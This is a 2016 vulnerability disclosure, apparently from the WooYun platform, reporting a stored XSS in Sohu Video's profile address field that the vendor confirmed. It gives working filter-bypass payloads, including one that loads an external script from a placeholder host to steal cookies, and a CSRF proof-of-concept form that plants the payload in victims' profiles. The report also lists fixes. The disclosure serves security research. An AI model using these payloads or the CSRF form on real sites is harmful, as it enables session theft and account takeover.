搜狐视频储存型XSS(过滤了尖括号/圆括号/单引号等字符下的利用技巧)

2016-06-02 12,504
漏洞标题 搜狐视频储存型XSS(过滤了尖括号/圆括号/单引号等字符下的利用技巧)
相关厂商 搜狐
漏洞作者 px1624
提交时间 2016-04-12 09:36
公开时间 2016-05-27 10:20
漏洞类型 XSS 跨站脚本攻击
危害等级
自评Rank 18
漏洞状态 厂商已经确认
Tags标签 xss,搜狐视频,csrf,xss利用技巧

漏洞详情

漏洞缺陷位置:基本资料 - 个人资料 - 通讯地址: http://my.tv.sohu.com/user/setting/basic.do

然后测试后发现,这里过滤了常见的script关键字,还有尖括号 >< ,单引号 ' ,圆括号 ) (

测试了一番后,绕过了这些过滤,成功弹窗。

payload:

xxxxxxxxxx" name=javasCript:alert%281%29 autofocus onfocus=location=this.name xx

代码执行流程如下图箭头所示:

1.jpg

然后尝试写入外部js文件,测试后发现有200字节的长度限制,注意一下过滤的那些东西,我直接给出payload吧。

xxxxxxxxxx" name=javasCript:s=document.createElement%28"sCript"%29;s.src="//xxxxx.js";document.body.appendChild%28s%29 autofocus onfocus=location=this.name xx

如下图,成功写入代码,生成调用外部js文件的js代码,获取cookie~

2.jpg

3.jpg

4.jpg

漏洞证明:

这里做下简单的说明,为什么payload要这么写呢?

1 由于过滤了尖括号><,所以只能在input标签内部构造,input标签最好用的xss事件就是onfocus了

2 由于过滤了圆括号(),所以用 location=url编码 的这种模式可以将括号写为%28 %29

3 由于过滤了单引号',所以location='alert%271%28'这样就不能用了,所以利用this.name进行传值

4 script关键字有过滤,所以用sCript大小写混淆绕过

基本就这样了吧,综上就可以得出上面的payload了~

下面再说下CSRF漏洞,因为这里的单一XSS漏洞没有什么意义,只是个selfxss自己x自己的。

然后这里的post保存请求没有验证referer,所以可以CSRF,2者结合起来就可以X别人了。

中招CSRF就直接埋下了持久的XSS后门。

这里直接给出可以埋下,调用任意外部js文件,的CSRF的poc代码:

<form id="csrfdemo" action="http://my.tv.sohu.com/user/profile/basic_update.do" method="POST">
<input type='hidden' name='nickname' value='test12341478524'><input type='hidden' name='sex' value='0'><input type='hidden' name='usermail' value=''><input type='hidden' name='year' value='0000'><input type='hidden' name='month' value='00'><input type='hidden' name='day' value='00'><input type='hidden' name='city1' value='0'><input type='hidden' name='usersign' value=''><input type='hidden' name='address' value='xxxxxxxxxx" name=javasCript:s=document.createElement%28"sCript"%29;s.src="//xxxxx.js";document.body.appendChild%28s%29 autofocus onfocus=location=this.name xx'><input type='hidden' name='postcode' value=''>
</form>
<button onclick="document.getElementById('csrfdemo').submit()">测试</button>

修复方案:

XSS 把剩下唯一没过滤的双引号,再过滤下就行了

CSRF 验证referer信息

版权声明:转载请注明来源 px1624@乌云

Tags:
评论  (0)
快来写下你的想法吧!

Chloe O_o

文章数:38596 积分: 0

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号